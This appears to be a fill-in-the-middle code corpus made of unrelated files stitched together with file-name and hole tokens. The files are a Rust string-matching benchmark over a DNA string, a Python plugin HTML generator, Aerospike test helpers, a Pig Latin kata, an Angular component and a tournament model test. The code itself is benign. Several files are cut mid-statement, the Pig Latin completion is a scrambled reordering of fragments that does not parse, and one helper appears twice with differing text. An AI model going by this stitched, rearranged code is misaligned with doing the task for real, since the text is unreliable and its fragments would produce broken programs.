CATCCTAAAGTAAGGTCAGCTAAATAAGCTATCGGGCCCATACCCCGAAAATGTTGGTTATACCCTTCCCGTACTAATT\ AATCCCCTGGCCCAACCCGTCATCTACTCTACCATCTTTGCAGGCACACTCATCACAGCGCTAAGCTCGCACTGATTTT\ TTACCTGAGTAGGCCTAGAAATAAACATGCTAGCTTTTATTCCAGTTCTAACCAAAAAAATAAACCCTCGTTCCACAGA\ AGCTGCCATCAAGTATTTCCTCACGCAAGCAACCGCATCCATAATCCTTCTAATAGCTATCCTCTTCAACAATATACTC\ TCCGGACAATGAACCATAACCAATACTACCAATCAATACTCATCATTAATAATCATAATAGCTATAGCAATAAAACTAG\ GAATAGCCCCCTTTCACTTCTGAGTCCCAGAGGTTACCCAAGGCACCCCTCTGACATCCGGCCTGCTTCTTCTCACATG\ ACAAAAACTAGCCCCCATCTCAATCATATACCAAATCTCTCCCTCACTAAACGTAAGCCTTCTCCTCACTCTCTCAATC\ TTATCCATCATAGCAGGCAGTTGAGGTGGATTAAACCAAACCCAGCTACGCAAAATCTTAGCATACTCCTCAATTACCC\ ACATAGGATGAATAATAGCAGTTCTACCGTACAACCCTAACATAACCATTCTTAATTTAACTATTTATATTATCCTAAC\ TACTACCGCATTCCTACTACTCAACTTAAACTCCAGCACCACGACCCTACTACTATCTCGCACCTGAAACAAGCTAACA\ TGACTAACACCCTTAATTCCATCCACCCTCCTCTCCCTAGGAGGCCTGCCCCCGCTAACCGGCTTTTTGCCCAAATGGG\ CCATTATCGAAGAATTCACAAAAAACAATAGCCTCATCATCCCCACCATCATAGCCACCATCACCCTCCTTAACCTCTA\ CTTCTACCTACGCCTAATCTACTCCACCTCAATCACACTACTCCCCATATCTAACAACGTAAAAATAAAATGACAGTTT\ GAACATACAAAACCCACCCCATTCCTCCCCACACTCATCGCCCTTACCACGCTACTCCTACCTATCTCCCCTTTTATAC\ TAATAATCTTATAGAAATTTAGGTTAAATACAGACCAAGAGCCTTCAAAGCCCTCAGTAAGTTGCAATACTTAATTTCT\ GTAACAGCTAAGGACTGCAAAACCCCACTCTGCATCAACTGAACGCAAATCAGCCACTTTAATTAAGCTAAGCCCTTAC\ TAGACCAATGGGACTTAAACCCACAAACACTTAGTTAACAGCTAAGCACCCTAATCAACTGGCTTCAATCTACTTCTCC\ CGCCGCCGGGAAAAAAGGCGGGAGAAGCCCCGGCAGGTTTGAAGCTGCTTCTTCGAATTTGCAATTCAATATGAAAATC\ ACCTCGGAGCTGGTAAAAAGAGGCCTAACCCCTGTCTTTAGATTTACAGTCCAATGCTTCACTCAGCCATTTTACCTCA\ CCCCCACTGATGTTCGCCGACCGTTGACTATTCTCTACAAACCACAAAGACATTGGAACACTATACCTATTATTCGGCG\ CATGAGCTGGAGTCCTAGGCACAGCTCTAAGCCTCCTTATTCGAGCCGAGCTGGGCCAGCCAGGCAACCTTCTAGGTAA\ CGACCACATCTACAACGTTATCGTCACAGCCCATGCATTTGTAATAATCTTCTTCATAGTAATACCCATCATAATCGGA\ GGCTTTGGCAACTGACTAGTTCCCCTAATAATCGGTGCCCCCGATATGGCGTTTCCCCGCATAAACAACATAAGCTTCT\ GACTCTTACCTCCCTCTCTCCTACTCCTGCTCGCATCTGCTATAGTGGAGGCCGGAGCAGGAACAGGTTGAACAGTCTA\ CCCTCCCTTAGCAGGGAACTACTCCCACCCTGGAGCCTCCGTAGACCTAACCATCTTCTCCTTACACCTAGCAGGTGTC\ TCCTCTATCTTAGGGGCCATCAATTTCATCACAACAATTATCAATATAAAACCCCCTGCCATAACCCAATACCAAACGC\ CCCTCTTCGTCTGATCCGTCCTAATCACAGCAGTCCTACTTCTCCTATCTCTCCCAGTCCTAGCTGCTGGCATCACTAT\ 
ACTACTAACAGACCGCAACCTCAACACCACCTTCTTCGACCCCGCCGGAGGAGGAGACCCCATTCTATACCAACACCTA\ TTCTGATTTTTCGGTCACCCTGAAGTTTATATTCTTATCCTACCAGGCTTCGGAATAATCTCCCATATTGTAACTTACT\ ACTCCGGAAAAAAAGAACCATTTGGATACATAGGTATGGTCTGAGCTATGATATCAATTGGCTTCCTAGGGTTTATCGT\ GTGAGCACACCATATATTTACAGTAGGAATAGACGTAGACACACGAGCATATTTCACCTCCGCTACCATAATCATCGCT\ ATCCCCACCGGCGTCAAAGTATTTAGCTGACTCGCCACACTCCACGGAAGCAATATGAAATGATCTGCTGCAGTGCTCT\ GAGCCCTAGGATTCATCTTTCTTTTCACCGTAGGTGGCCTGACTGGCATTGTATTAGCAAACTCATCACTAGACATCGT\ ACTACACGACACGTACTACGTTGTAGCCCACTTCCACTATGTCCTATCAATAGGAGCTGTATTTGCCATCATAGGAGGC\ TTCATTCACTGATTTCCCCTATTCTCAGGCTACACCCTAGACCAAACCTACGCCAAAATCCATTTCACTATCATATTCA\ TCGGCGTAAATCTAACTTTCTTCCCACAACACTTTCTCGGCCTATCCGGAATGCCCCGACGTTACTCGGACTACCCCGA\ TGCATACACCACATGAAACATCCTATCATCTGTAGGCTCATTCATTTCTCTAACAGCAGTAATATTAATAATTTTCATG\ ATTTGAGAAGCCTTCGCTTCGAAGCGAAAAGTCCTAATAGTAGAAGAACCCTCCATAAACCTGGAGTGACTATATGGAT\ GCCCCCCACCCTACCACACATTCGAAGAACCCGTATACATAAAATCTAGACAAAAAAGGAAGGAATCGAACCCCCCAAA\ GCTGGTTTCAAGCCAACCCCATGGCCTCCATGACTTTTTCAAAAAGGTATTAGAAAAACCATTTCATAACTTTGTCAAA\ GTTAAATTATAGGCTAAATCCTATATATCTTAATGGCACATGCAGCGCAAGTAGGTCTACAAGACGCTACTTCCCCTAT\ CATAGAAGAGCTTATCACCTTTCATGATCACGCCCTCATAATCATTTTCCTTATCTGCTTCCTAGTCCTGTATGCCCTT\ TTCCTAACACTCACAACAAAACTAACTAATACTAACATCTCAGACGCTCAGGAAATAGAAACCGTCTGAACTATCCTGC\ CCGCCATCATCCTAGTCCTCATCGCCCTCCCATCCCTACGCATCCTTTACATAACAGACGAGGTCAACGATCCCTCCCT\ TACCATCAAATCAATTGGCCACCAATGGTACTGAACCTACGAGTACACCGACTACGGCGGACTAATCTTCAACTCCTAC\ ATACTTCCCCCATTATTCCTAGAACCAGGCGACCTGCGACTCCTTGACGTTGACAATCGAGTAGTACTCCCGATTGAAG\ CCCCCATTCGTATAATAATTACATCACAAGACGTCTTGCACTCATGAGCTGTCCCCACATTAGGCTTAAAAACAGATGC\ AATTCCCGGACGTCTAAACCAAACCACTTTCACCGCTACACGACCGGGGGTATACTACGGTCAATGCTCTGAAATCTGT\ GGAGCAAACCACAGTTTCATGCCCATCGTCCTAGAATTAATTCCCCTAAAAATCTTTGAAATAGGGCCCGTATTTACCC\ TATAGCACCCCCTCTACCCCCTCTAGAGCCCACTGTAAAGCTAACTTAGCATTAACCTTTTAAGTTAAAGATTAAGAGA\ ACCAACACCTCTTTACAGTGAAATGCCCCAACTAAATACTACCGTATGGCCCACCATAATTACCCCCATACTCCTTACA\ CTATTCCTCATCACCCAACTAAAAATATTAAACACAAACTACCACCTACCTCCCTCACCAAAGCCCATAAAAATAAAAA\ ATTATAACAAACCCTGAGAACCAAAATGAACGAAAATCTGTTCGCTTCATTCATTGCCCCCACAATCCTAGGCCTACCC\ GCCGCAGTACTGATCATTCTATTTCCCCCTCTATTGATCCCCACCTCCAAATATCTCATCAACAACCGACTAATCACCA\ CCCAACAATGACTAATCAAACTAACCTCAAAACAAATGATAACCATACACAACACTAAAGGACGAACCTGATCTCTTAT\ ACTAGTATCCTTAATCATTTTTATTGCCACAACTAACCTCCTCGGACTCCTGCCTCACTCATTTACACCAACCACCCAA\ CTATCTATAAACCTAGCCATGGCCATCCCCTTATGAGCGGGCACAGTGATTATAGGCTTTCGCTCTAAGATTAAAAATG\ CCCTAGCCCACTTCTTACCACAAGGCACACCTACACCCCTTATCCCCATACTAGTTATTATCGAAACCATCAGCCTACT\ CATTCAACCAATAGCCCTGGCCGTACGCCTAACCGCTAACATTACTGCAGGCCACCTACTCATGCACCTAATTGGAAGC\ GCCACCCTAGCAATATCAACCATTAACCTTCCCTCTACACTTATCATCTTCACAATTCTAATTCTACTGACTATCCTAG\ AAATCGCTGTCGCCTTAATCCAAGCCTACGTTTTCACACTTCTAGTAAGCCTCTACCTGCACGACAACACATAATGACC\ CACCAATCACATGCCTATCATATAGTAAAACCCAGCCCATGACCCCTAACAGGGGCCCTCTCAGCCCTCCTAATGACCT\ CCGGCCTAGCCATGTGATTTCACTTCCACTCCATAACGCTCCTCATACTAGGCCTACTAACCAACACACTAACCATATA\ CCAATGATGGCGCGATGTAACACGAGAAAGCACATACCAAGGCCACCACACACCACCTGTCCAAAAAGGCCTTCGATAC\ GGGATAATCCTATTTATTACCTCAGAAGTTTTTTTCTTCGCAGGATTTTTCTGAGCCTTTTACCACTCCAGCCTAGCCC\ CTACCCCCCAATTAGGAGGGCACTGGCCCCCAACAGGCATCACCCCGCTAAATCCCCTAGAAGTCCCACTCCTAAACAC\ ATCCGTATTACTCGCATCAGGAGTATCAATCACCTGAGCTCACCATAGTCTAATAGAAAACAACCGAAACCAAATAATT\ CAAGCACTGCTTATTACAATTTTACTGGGTCTCTATTTTACCCTCCTACAAGCCTCAGAGTACTTCGAGTCTCCCTTCA\ CCATTTCCGACGGCATCTACGGCTCAACATTTTTTGTAGCCACAGGCTTCCACGGACTTCACGTCATTATTGGCTCAAC\ TTTCCTCACTATCTGCTTCATCCGCCAACTAATATTTCACTTTACATCCAAACATCACTTTGGCTTCGAAGCCGCCGCC\ 
TGATACTGGCATTTTGTAGATGTGGTTTGACTATTTCTGTATGTCTCCATCTATTGATGAGGGTCTTACTCTTTTAGTA\ TAAATAGTACCGTTAACTTCCAATTAACTAGTTTTGACAACATTCAAAAAAGAGTAATAAACTTCGCCTTAATTTTAAT\ AATCAACACCCTCCTAGCCTTACTACTAATAATTATTACATTTTGACTACCACAACTCAACGGCTACATAGAAAAATCC\ ACCCCTTACGAGTGCGGCTTCGACCCTATATCCCCCGCCCGCGTCCCTTTCTCCATAAAATTCTTCTTAGTAGCTATTA\ CCTTCTTATTATTTGATCTAGAAATTGCCCTCCTTTTACCCCTACCATGAGCCCTACAAACAACTAACCTGCCACTAAT\ AGTTATGTCATCCCTCTTATTAATCATCATCCTAGCCCTAAGTCTGGCCTATGAGTGACTACAAAAAGGATTAGACTGA\ ACCGAATTGGTATATAGTTTAAACAAAACGAATGATTTCGACTCATTAAATTATGATAATCATATTTACCAAATGCCCC\ TCATTTACATAAATATTATACTAGCATTTACCATCTCACTTCTAGGAATACTAGTATATCGCTCACACCTCATATCCTC\ CCTACTATGCCTAGAAGGAATAATACTATCGCTGTTCATTATAGCTACTCTCATAACCCTCAACACCCACTCCCTCTTA\ GCCAATATTGTGCCTATTGCCATACTAGTCTTTGCCGCCTGCGAAGCAGCGGTGGGCCTAGCCCTACTAGTCTCAATCT\ CCAACACATATGGCCTAGACTACGTACATAACCTAAACCTACTCCAATGCTAAAACTAATCGTCCCAACAATTATATTA\ CTACCACTGACATGACTTTCCAAAAAACACATAATTTGAATCAACACAACCACCCACAGCCTAATTATTAGCATCATCC\ CTCTACTATTTTTTAACCAAATCAACAACAACCTATTTAGCTGTTCCCCAACCTTTTCCTCCGACCCCCTAACAACCCC\ CCTCCTAATACTAACTACCTGACTCCTACCCCTCACAATCATGGCAAGCCAACGCCACTTATCCAGTGAACCACTATCA\ CGAAAAAAACTCTACCTCTCTATACTAATCTCCCTACAAATCTCCTTAATTATAACATTCACAGCCACAGAACTAATCA\ TATTTTATATCTTCTTCGAAACCACACTTATCCCCACCTTGGCTATCATCACCCGATGAGGCAACCAGCCAGAACGCCT\ GAACGCAGGCACATACTTCCTATTCTACACCCTAGTAGGCTCCCTTCCCCTACTCATCGCACTAATTTACACTCACAAC\ ACCCTAGGCTCACTAAACATTCTACTACTCACTCTCACTGCCCAAGAACTATCAAACTCCTGAGCCAACAACTTAATAT\ GACTAGCTTACACAATAGCTTTTATAGTAAAGATACCTCTTTACGGACTCCACTTATGACTCCCTAAAGCCCATGTCGA\ AGCCCCCATCGCTGGGTCAATAGTACTTGCCGCAGTACTCTTAAAACTAGGCGGCTATGGTATAATACGCCTCACACTC\ ATTCTCAACCCCCTGACAAAACACATAGCCTACCCCTTCCTTGTACTATCCCTATGAGGCATAATTATAACAAGCTCCA\ TCTGCCTACGACAAACAGACCTAAAATCGCTCATTGCATACTCTTCAATCAGCCACATAGCCCTCGTAGTAACAGCCAT\ TCTCATCCAAACCCCCTGAAGCTTCACCGGCGCAGTCATTCTCATAATCGCCCACGGGCTTACATCCTCATTACTATTC\ TGCCTAGCAAACTCAAACTACGAACGCACTCACAGTCGCATCATAATCCTCTCTCAAGGACTTCAAACTCTACTCCCAC\ TAATAGCTTTTTGATGACTTCTAGCAAGCCTCGCTAACCTCGCCTTACCCCCCACTATTAACCTACTGGGAGAACTCTC\ TGTGCTAGTAACCACGTTCTCCTGATCAAATATCACTCTCCTACTTACAGGACTCAACATACTAGTCACAGCCCTATAC\ TCCCTCTACATATTTACCACAACACAATGGGGCTCACTCACCCACCACATTAACAACATAAAACCCTCATTCACACGAG\ AAAACACCCTCATGTTCATACACCTATCCCCCATTCTCCTCCTATCCCTCAACCCCGACATCATTACCGGGTTTTCCTC\ TTGTAAATATAGTTTAACCAAAACATCAGATTGTGAATCTGACAACAGAGGCTTACGACCCCTTATTTACCGAGAAAGC\ TCACAAGAACTGCTAACTCATGCCCCCATGTCTAACAACATGGCTTTCTCAACTTTTAAAGGATAACAGCTATCCATTG\ GTCTTAGGCCCCAAAAATTTTGGTGCAACTCCAAATAAAAGTAATAACCATGCACACTACTATAACCACCCTAACCCTG\ ACTTCCCTAATTCCCCCCATCCTTACCACCCTCGTTAACCCTAACAAAAAAAACTCATACCCCCATTATGTAAAATCCA\ TTGTCGCATCCACCTTTATTATCAGTCTCTTCCCCACAACAATATTCATGTGCCTAGACCAAGAAGTTATTATCTCGAA\ CTGACACTGAGCCACAACCCAAACAACCCAGCTCTCCCTAAGCTTCAAACTAGACTACTTCTCCATAATATTCATCCCT\ GTAGCATTGTTCGTTACATGGTCCATCATAGAATTCTCACTGTGATATATAAACTCAGACCCAAACATTAATCAGTTCT\ TCAAATATCTACTCATCTTCCTAATTACCATACTAATCTTAGTTACCGCTAACAACCTATTCCAACTGTTCATCGGCTG\ AGAGGGCGTAGGAATTATATCCTTCTTGCTCATCAGTTGATGATACGCCCGAGCAGATGCCAACACAGCAGCCATTCAA\ GCAATCCTATACAACCGTATCGGCGATATCGGTTTCATCCTCGCCTTAGCATGATTTATCCTACACTCCAACTCATGAG\ ACCCACAACAAATAGCCCTTCTAAACGCTAATCCAAGCCTCACCCCACTACTAGGCCTCCTCCTAGCAGCAGCAGGCAA\ ATCAGCCCAATTAGGTCTCCACCCCTGACTCCCCTCAGCCATAGAAGGCCCCACCCCAGTCTCAGCCCTACTCCACTCA\ AGCACTATAGTTGTAGCAGGAATCTTCTTACTCATCCGCTTCCACCCCCTAGCAGAAAATAGCCCACTAATCCAAACTC\ TAACACTATGCTTAGGCGCTATCACCACTCTGTTCGCAGCAGTCTGCGCCCTTACACAAAATGACATCAAAAAAATCGT\ AGCCTTCTCCACTTCAAGTCAACTAGGACTCATAATAGTTACAATCGGCATCAACCAACCACACCTAGCATTCCTGCAC\ 
ATCTGTACCCACGCCTTCTTCAAAGCCATACTATTTATGTGCTCCGGGTCCATCATCCACAACCTTAACAATGAACAAG\ ATATTCGAAAAATAGGAGGACTACTCAAAACCATACCTCTCACTTCAACCTCCCTCACCATTGGCAGCCTAGCATTAGC\ AGGAATACCTTTCCTCACAGGTTTCTACTCCAAAGACCACATCATCGAAACCGCAAACATATCATACACAAACGCCTGA\ GCCCTATCTATTACTCTCATCGCTACCTCCCTGACAAGCGCCTATAGCACTCGAATAATTCTTCTCACCCTAACAGGTC\ AACCTCGCTTCCCCACCCTTACTAACATTAACGAAAATAACCCCACCCTACTAAACCCCATTAAACGCCTGGCAGCCGG\ AAGCCTATTCGCAGGATTTCTCATTACTAACAACATTTCCCCCGCATCCCCCTTCCAAACAACAATCCCCCTCTACCTA\ AAACTCACAGCCCTCGCTGTCACTTTCCTAGGACTTCTAACAGCCCTAGACCTCAACTACCTAACCAACAAACTTAAAA\ TAAAATCCCCACTATGCACATTTTATTTCTCCAACATACTCGGATTCTACCCTAGCATCACACACCGCACAATCCCCTA\ TCTAGGCCTTCTTACGAGCCAAAACCTGCCCCTACTCCTCCTAGACCTAACCTGACTAGAAAAGCTATTACCTAAAACA\ ATTTCACAGCACCAAATCTCCACCTCCATCATCACCTCAACCCAAAAAGGCATAATTAAACTTTACTTCCTCTCTTTCT\ TCTTCCCACTCATCCTAACCCTACTCCTAATCACATAACCTATTCCCCCGAGCAATCTCAATTACAATATATACACCAA\ CAAACAATGTTCAACCAGTAACTACTACTAATCAACGCCCATAATCATACAAAGCCCCCGCACCAATAGGATCCTCCCG\ AATCAACCCTGACCCCTCTCCTTCATAAATTATTCAGCTTCCTACACTATTAAAGTTTACCACAACCACCACCCCATCA\ TACTCTTTCACCCACAGCACCAATCCTACCTCCATCGCTAACCCCACTAAAACACTCACCAAGACCTCAACCCCTGACC\ CCCATGCCTCAGGATACTCCTCAATAGCCATCGCTGTAGTATATCCAAAGACAACCATCATTCCCCCTAAATAAATTAA\ AAAAACTATTAAACCCATATAACCTCCCCCAAAATTCAGAATAATAACACACCCGACCACACCGCTAACAATCAATACT\ AAACCCCCATAAATAGGAGAAGGCTTAGAAGAAAACCCCACAAACCCCATTACTAAACCCACACTCAACAGAAACAAAG\ CATACATCATTATTCTCGCACGGACTACAACCACGACCAATGATATGAAAAACCATCGTTGTATTTCAACTACAAGAAC\ ACCAATGACCCCAATACGCAAAACTAACCCCCTAATAAAATTAATTAACCACTCATTCATCGACCTCCCCACCCCATCC\ AACATCTCCGCATGATGAAACTTCGGCTCACTCCTTGGCGCCTGCCTGATCCTCCAAATCACCACAGGACTATTCCTAG\ CCATGCACTACTCACCAGACGCCTCAACCGCCTTTTCATCAATCGCCCACATCACTCGAGACGTAAATTATGGCTGAAT\ CATCCGCTACCTTCACGCCAATGGCGCCTCAATATTCTTTATCTGCCTCTTCCTACACATCGGGCGAGGCCTATATTAC\ GGATCATTTCTCTACTCAGAAACCTGAAACATCGGCATTATCCTCCTGCTTGCAACTATAGCAACAGCCTTCATAGGCT\ ATGTCCTCCCGTGAGGCCAAATATCATTCTGAGGGGCCACAGTAATTACAAACTTACTATCCGCCATCCCATACATTGG\ GACAGACCTAGTTCAATGAATCTGAGGAGGCTACTCAGTAGACAGTCCCACCCTCACACGATTCTTTACCTTTCACTTC\ ATCTTGCCCTTCATTATTGCAGCCCTAGCAACACTCCACCTCCTATTCTTGCACGAAACGGGATCAAACAACCCCCTAG\ GAATCACCTCCCATTCCGATAAAATCACCTTCCACCCTTACTACACAATCAAAGACGCCCTCGGCTTACTTCTCTTCCT\ TCTCTCCTTAATGACATTAACACTATTCTCACCAGACCTCCTAGGCGACCCAGACAATTATACCCTAGCCAACCCCTTA\ AACACCCCTCCCCACATCAAGCCCGAATGATATTTCCTATTCGCCTACACAATTCTCCGATCCGTCCCTAACAAACTAG\ GAGGCGTCCTTGCCCTATTACTATCCATCCTCATCCTAGCAATAATCCCCATCCTCCATATATCCAAACAACAAAGCAT\ AATATTTCGCCCACTAAGCCAATCACTTTATTGACTCCTAGCCGCAGACCTCCTCATTCTAACCTGAATCGGAGGACAA\ CCAGTAAGCTACCCTTTTACCATCATTGGACAAGTAGCATCCGTACTATACTTCACAACAATCCTAATCCTAATACCAA\ CTATCTCCCTAATTGAAAACAAAATACTCAAATGGGCCTGTCCTTGTAGTATAAACTAATACACCAGTCTTGTAAACCG\ GAGATGAAAACCTTTTTCCAAGGACAAATCAGAGAAAAAGTCTTTAACTCCACCATTAGCACCCAAAGCTAAGATTCTA\ ATTTAAACTATTCTCTGTTCTTTCATGGGGAAGCAGATTTGGGTACCACCCAAGTATTGACTCACCCATCAACAACCGC\ TATGTATTTCGTACATTACTGCCAGCCACCATGAATATTGTACGGTACCATAAATACTTGACCACCTGTAGTACATAAA\ AACCCAATCCACATCAAAACCCCCTCCCCATGCTTACAAGCAAGTACAGCAATCAACCCTCAACTATCACACATCAACT\ GCAACTCCAAAGCCACCCCTCACCCACTAGGATACCAACAAACCTACCCACCCTTAACAGTACATAGTACATAAAGCCA\ TTTACCGTACATAGCACATTACAGTCAAATCCCTTCTCGTCCCCATGGATGACCCCCCTCAGATAGGGGTCCCTTGACC\ ACCATCCTCCGTGAAATCAATATCCCGCACAAGAGTGCTACTCTCCTCGCTCCGGGCCCATAACACTTGGGGGTAGCTA\ AAGTGAACTGTATCCGACATCTGGTTCCTACTTCAGGGTCATAAAGCCTAAATAGCCCACACGTTCCCCTTAAATAAGA\ CATCACGATG"; static PATTERN: &'static [u8] = b"GCGCGTACACACCGCCCG"; #[bench] fn bench_shift_and(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let shiftand = ShiftAnd::new(PATTERN); 
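// The matcher is rebuilt inside the closure, so each iteration measures construction as well as the search.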
shiftand.find_all(TEXT.iter()).collect::<Vec<usize>>(); }); } #[bench] fn bench_bndm(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let bndm = BNDM::new(PATTERN); bndm.find_all(TEXT).collect::<Vec<usize>>(); }); } #[bench] fn bench_bom(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let bom = BOM::new(PATTERN); bom.find_all(TEXT).collect::<Vec<usize>>(); }); } #[bench] fn bench_horspool(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let horspool = Horspool::new(PATTERN); horspool.find_all(TEXT).collect::<Vec<usize>>(); }); } #[bench] fn bench_kmp(b: &mut Bencher) { b.iter(|| for _ in 0..10000 { let kmp = KMP::new(PATTERN); kmp.find_all(TEXT.iter()).collect::<Vec<usize>>(); }); }<|fim▁end|>
AAACGAAAGTTTAACTAAGCTATACTAACCCCAGGGTTGGTCAATTTCGTGCCAGCCACCGCGGTCACACGATTAACCC\
<|file_name|>plugin.py<|end_file_name|><|fim▁begin|>import StringIO class Plugin(object): ANGULAR_MODULE = None JS_FILES = [] CSS_FILES = [] @classmethod def PlugIntoApp(cls, app): pass @classmethod def GenerateHTML(cls, root_url="/"): out = StringIO.StringIO() for js_file in cls.JS_FILES: js_file = js_file.lstrip("/") out.write('<script src="%s%s"></script>\n' % (root_url, js_file)) for css_file in cls.CSS_FILES: css_file = css_file.lstrip("/") out.write('<link rel="stylesheet" href="%s%s"></link>\n' % (<|fim▁hole|> if cls.ANGULAR_MODULE: out.write(""" <script>var manuskriptPluginsList = manuskriptPluginsList || [];\n manuskriptPluginsList.push("%s");</script>\n""" % cls.ANGULAR_MODULE) return out.getvalue()<|fim▁end|>
root_url, css_file))
<|file_name|>util.py<|end_file_name|><|fim▁begin|># Copyright 2013-2021 Aerospike, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import re from lib.utils import util def parse_record(parent_field, record): field_names = [] field_values = [] for name in record: if isinstance(record[name], dict): new_parent_field = parent_field.copy() new_parent_field.append(name) names = " ".join(new_parent_field) if "converted" in record[name]: field_names.append(names) field_values.append(record[name]["converted"]) elif "raw" in record[name]: field_names.append(names) field_values.append(record[name]["raw"]) else: # Must have subgroups: sub_names, sub_values = parse_record(new_parent_field, record[name]) field_names.extend(sub_names) field_values.extend(sub_values) else: raise Exception("Unhandled parsing") return field_names, field_values def parse_output(actual_out={}, horizontal=False, header_len=2, merge_header=True): """ commmon parser for all show commands will return tuple of following @param heading : first line of output @param header: Second line of output @param params: list of parameters """ title = actual_out["title"] description = actual_out.get("description", "") data_names = {} data_values = [] num_records = 0 for group in actual_out["groups"]: for record in group["records"]: temp_names, temp_values = parse_record([], record) # We assume every record has the same set of names if len(data_names) == 0: data_names = temp_names data_values.append(temp_values) num_records += 1 return title, description, data_names, data_values, num_records def get_separate_output(in_str=""): _regex = re.compile(r"((?<=^{).*?(?=^}))", re.MULTILINE | re.DOTALL) out = re.findall(_regex, in_str) ls = [] for item in out: item = remove_escape_sequence(item) item = "{" + item + "}" ls.append(json.loads(item)) return ls def capture_separate_and_parse_output(rc, commands): actual_stdout = util.capture_stdout(rc.execute, commands) separated_stdout = get_separate_output(actual_stdout) result = parse_output(separated_stdout[0]) return result def get_merged_header(*lines): h = [[_f for _f in _h.split(" ") if _f] for _h in lines] header = [] if len(h) == 0 or any(len(h[i]) != len(h[i + 1]) for i in range(len(h) - 1)): return header for idx in range(len(h[0])): header_i = h[0][idx] for jdx in range(len(h) - 1): if h[jdx + 1][idx] == ".": break header_i += " " + h[jdx + 1][idx] header.append(header_i) return header def check_for_subset(actual_list, expected_sub_list): if not expected_sub_list: return True if not actual_list: return False for i in expected_sub_list: if isinstance(i, tuple): found = False for s_i in i: if s_i is None: found = True break if s_i in actual_list: found = True break if not found: print(i, actual_list) return False else: if i not in actual_list: print(i) return False return True # Checks that a single expected list has a subset equal to actual_list. 
def check_for_subset_in_list_of_lists(actual_list, list_of_expected_sub_lists): for expected_list in list_of_expected_sub_lists: if check_for_subset(actual_list, expected_list): return True return False def remove_escape_sequence(line): ansi_escape = re.compile(r"(\x9b|\x1b\[)[0-?]*[ -\/]*[@-~]") return ansi_escape.sub("", line) def check_for_types(actual_lists, expected_types): def is_float(x): try: float(x) if "." in x: return True return False except ValueError: return False<|fim▁hole|> if "." in x: return False return True except ValueError: return False def is_bool(x): if x in ("True", "true", "False", "false"): return True return False def check_list_against_types(a_list): if a_list is None or expected_types is None: return False if len(a_list) == len(expected_types): for idx in range(len(a_list)): typ = expected_types[idx] val = a_list[idx] if typ == int: if not is_int(val): return False elif typ == float: if not is_float(val): return False elif typ == bool: if not is_bool(val): return False elif typ == str: if any([is_bool(val), is_int(val), is_float(val)]): return False else: raise Exception("Type is not yet handles in test_util.py", typ) return True return False for actual_list in actual_lists: if not check_list_against_types(actual_list): return False return True<|fim▁end|>
def is_int(x): try: int(x)
 if "." in x: return False return True except ValueError: return False def is_bool(x): if x in ("True", "true", "False", "false"): return True return False def check_list_against_types(a_list): if a_list is None or expected_types is None: return False if len(a_list) == len(expected_types): for idx in range(len(a_list)): typ = expected_types[idx] val = a_list[idx] if typ == int: if not is_int(val): return False elif typ == float: if not is_float(val): return False elif typ == bool: if not is_bool(val): return False elif typ == str: if any([is_bool(val), is_int(val), is_float(val)]): return False else: raise Exception("Type is not yet handled in test_util.py", typ) return True return False for actual_list in actual_lists: if not check_list_against_types(actual_list): return False return True<|fim▁end|>
<|file_name|>Simple Pig Latin.py<|end_file_name|><|fim▁begin|>def pig_it(text): return ' '.join([x[1:]+x[0]+'ay' if x.isalpha() else x for x in text.split()]) # This is really just filtering and re-joining the two string pieces, which is much easier than moving characters around; a clever approach. <|fim▁hole|>
# a if xx else b: a single-line conditional for handling the irregular tokens, where xx is the condition; a standard idiom. for x in text.split() if x.isalpha()
 x[1:]+x[0]+'ay' else x return ' '.join([ ])<|fim▁end|>
<|file_name|>code.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit, OnDestroy } from '@angular/core'; import { Http } from '@angular/http'; import { Router, ActivatedRoute } from '@angular/router'; import { Observable, Subject, Subscription } from 'rxjs'; import { CodeLayer } from '../core/model/code-layer.model'; import { CodeService } from '../core/services/code.service'; import { NavigationService } from '../core/services/navigation.service'; <|fim▁hole|>}) export class CodeComponent implements OnInit, OnDestroy { public showCode: boolean; public focusOn: string; public focusDiv: boolean; public codeSections: any[]; public codeSubscription: Subscription; public urlSubscription: Subscription; public location: string; constructor(private http: Http, private router: Router, private codeService: CodeService, private navigationService: NavigationService) { let a: any = this.router.url.split('/'); if(a.length === 4) { this.focusOn = '_'+a[3].split('-').join('')+'_'; this.focusDiv = true; } this.urlSubscription = this.navigationService.locationSubscription$.subscribe(x=> { let a: any = this.router.url.split('/'); if(a.length === 4) { this.focusOn = '_'+a[3].split('-').join('')+'_'; this.focusDiv = true; } }); this.codeSections = this.codeService.getCodeLayers(); if(!this.codeSections.length) { this.codeSubscription = this.codeService.codeSubscription$.subscribe(x=> { this.codeSections = this.codeService.getCodeLayers(); this.showCode = true; }); } else { this.showCode = true; } } focusElement(e: Event) { console.log(e); this.focusOn = e.srcElement.getAttribute('data-layer'); this.focusDiv = true; } ngOnInit() { } ngOnDestroy() { if(this.urlSubscription) this.urlSubscription.unsubscribe(); if(this.codeSubscription) this.codeSubscription.unsubscribe(); } removeFocus() { this.focusOn = null; this.focusDiv = false; } }<|fim▁end|>
@Component({ selector: 'app-code', templateUrl: './code.component.html'
<|file_name|>test_models.py<|end_file_name|><|fim▁begin|>from models.team import Team from models.tournament import Tournament from models.tree import ProbableTournamentTree import unittest import pdb class TestTeam(unittest.TestCase): def setUp(self): self.tournament = Tournament() self.teams = self.tournament.teams self.usa = Team.get_for_country(self.teams, 'United States') self.brazil = Team.get_for_country(self.teams, 'Brazil') def test_add_friendly_result(self): self.usa.add_friendly_result(opponent=self.brazil) self.usa.add_friendly_result(opponent=self.brazil, result=Team.DRAW) self.usa.add_friendly_result(opponent=self.brazil, result=Team.LOSS) self.assertIn(self.brazil, self.usa.friendly_results['wins']) self.assertIn(self.brazil, self.usa.friendly_results['draws']) self.assertIn(self.brazil, self.usa.friendly_results['losses']) # try adding a friendly result for a team not in the tourney prev_draws = len(self.usa.friendly_results['draws']) 